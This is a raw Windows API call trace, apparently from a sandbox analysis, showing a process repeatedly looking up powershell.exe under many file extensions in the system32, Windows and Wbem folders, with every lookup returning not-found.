	[0194.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.949] GetLastError () returned 0x2
	[0194.949] SetErrorMode (uMode=0x1) returned 0x1
	[0194.949] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.ps1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.949] GetLastError () returned 0x2
	[0194.949] SetErrorMode (uMode=0x1) returned 0x1
	[0194.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.949] GetLastError () returned 0x2
	[0194.949] SetErrorMode (uMode=0x1) returned 0x1
	[0194.950] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psm1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.950] GetLastError () returned 0x2
	[0194.950] SetErrorMode (uMode=0x1) returned 0x1
	[0194.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.950] GetLastError () returned 0x2
	[0194.950] SetErrorMode (uMode=0x1) returned 0x1
	[0194.950] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psd1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.951] GetLastError () returned 0x2
	[0194.951] SetErrorMode (uMode=0x1) returned 0x1
	[0194.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.951] GetLastError () returned 0x2
	[0194.951] SetErrorMode (uMode=0x1) returned 0x1
	[0194.951] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.COM", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.951] GetLastError () returned 0x2
	[0194.951] SetErrorMode (uMode=0x1) returned 0x1
	[0194.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.952] GetLastError () returned 0x2
	[0194.952] SetErrorMode (uMode=0x1) returned 0x1
	[0194.952] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.EXE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.952] GetLastError () returned 0x2
	[0194.952] SetErrorMode (uMode=0x1) returned 0x1
	[0194.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.952] GetLastError () returned 0x2
	[0194.952] SetErrorMode (uMode=0x1) returned 0x1
	[0194.953] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.BAT", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.953] GetLastError () returned 0x2
	[0194.953] SetErrorMode (uMode=0x1) returned 0x1
	[0194.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.953] GetLastError () returned 0x2
	[0194.953] SetErrorMode (uMode=0x1) returned 0x1
	[0194.953] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.CMD", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.953] GetLastError () returned 0x2
	[0194.954] SetErrorMode (uMode=0x1) returned 0x1
	[0194.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.954] GetLastError () returned 0x2
	[0194.954] SetErrorMode (uMode=0x1) returned 0x1
	[0194.954] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBS", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.954] GetLastError () returned 0x2
	[0194.954] SetErrorMode (uMode=0x1) returned 0x1
	[0194.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.954] GetLastError () returned 0x2
	[0194.954] SetErrorMode (uMode=0x1) returned 0x1
	[0194.955] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.955] GetLastError () returned 0x2
	[0194.955] SetErrorMode (uMode=0x1) returned 0x1
	[0194.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.955] GetLastError () returned 0x2
	[0194.955] SetErrorMode (uMode=0x1) returned 0x1
	[0194.956] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JS", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.956] GetLastError () returned 0x2
	[0194.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.956] GetLastError () returned 0x2
	[0194.956] SetErrorMode (uMode=0x1) returned 0x1
	[0194.956] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JSE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.956] GetLastError () returned 0x2
	[0194.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.957] GetLastError () returned 0x2
	[0194.957] SetErrorMode (uMode=0x1) returned 0x1
	[0194.957] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSF", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.957] GetLastError () returned 0x2
	[0194.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.957] GetLastError () returned 0x2
	[0194.957] SetErrorMode (uMode=0x1) returned 0x1
	[0194.957] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSH", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.958] GetLastError () returned 0x2
	[0194.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.958] GetLastError () returned 0x2
	[0194.958] SetErrorMode (uMode=0x1) returned 0x1
	[0194.958] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.MSC", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.958] GetLastError () returned 0x2
	[0194.958] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.958] GetLastError () returned 0x2
	[0194.959] SetErrorMode (uMode=0x1) returned 0x1
	[0194.959] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.959] GetLastError () returned 0x2
	[0194.959] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.959] GetLastError () returned 0x2
	[0194.959] SetErrorMode (uMode=0x1) returned 0x1
	[0194.959] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.ps1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.960] GetLastError () returned 0x2
	[0194.960] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.960] GetLastError () returned 0x2
	[0194.960] SetErrorMode (uMode=0x1) returned 0x1
	[0194.960] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psm1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.960] GetLastError () returned 0x2
	[0194.960] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.960] GetLastError () returned 0x2
	[0194.960] SetErrorMode (uMode=0x1) returned 0x1
	[0194.960] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psd1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.960] GetLastError () returned 0x2
	[0194.961] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.961] GetLastError () returned 0x2
	[0194.961] SetErrorMode (uMode=0x1) returned 0x1
	[0194.961] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.COM", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.961] GetLastError () returned 0x2
	[0194.961] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.961] GetLastError () returned 0x2
	[0194.961] SetErrorMode (uMode=0x1) returned 0x1
	[0194.962] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.EXE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.962] GetLastError () returned 0x2
	[0194.962] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.962] GetLastError () returned 0x2
	[0194.962] SetErrorMode (uMode=0x1) returned 0x1
	[0194.962] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.BAT", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.962] GetLastError () returned 0x2
	[0194.963] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.963] GetLastError () returned 0x2
	[0194.963] SetErrorMode (uMode=0x1) returned 0x1
	[0194.963] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.CMD", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.963] GetLastError () returned 0x2
	[0194.963] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.963] GetLastError () returned 0x2
	[0194.963] SetErrorMode (uMode=0x1) returned 0x1
	[0194.964] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBS", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.964] GetLastError () returned 0x2
	[0194.964] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.964] GetLastError () returned 0x2
	[0194.964] SetErrorMode (uMode=0x1) returned 0x1
	[0194.964] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.964] GetLastError () returned 0x2
	[0194.964] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.964] GetLastError () returned 0x2
	[0194.964] SetErrorMode (uMode=0x1) returned 0x1
	[0194.965] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JS", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.965] GetLastError () returned 0x2
	[0194.965] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.965] GetLastError () returned 0x2
	[0194.965] SetErrorMode (uMode=0x1) returned 0x1
	[0194.965] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JSE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.965] GetLastError () returned 0x2
	[0194.965] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.966] GetLastError () returned 0x2
	[0194.966] SetErrorMode (uMode=0x1) returned 0x1
	[0194.966] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSF", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.966] GetLastError () returned 0x2
	[0194.966] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.966] GetLastError () returned 0x2
	[0194.966] SetErrorMode (uMode=0x1) returned 0x1
	[0194.966] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSH", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.967] GetLastError () returned 0x2
	[0194.967] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.967] GetLastError () returned 0x2
	[0194.967] SetErrorMode (uMode=0x1) returned 0x1
	[0194.967] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.MSC", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.967] GetLastError () returned 0x2
	[0194.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.967] GetLastError () returned 0x2
	[0194.967] SetErrorMode (uMode=0x1) returned 0x1
	[0194.967] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.968] GetLastError () returned 0x2
	[0194.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
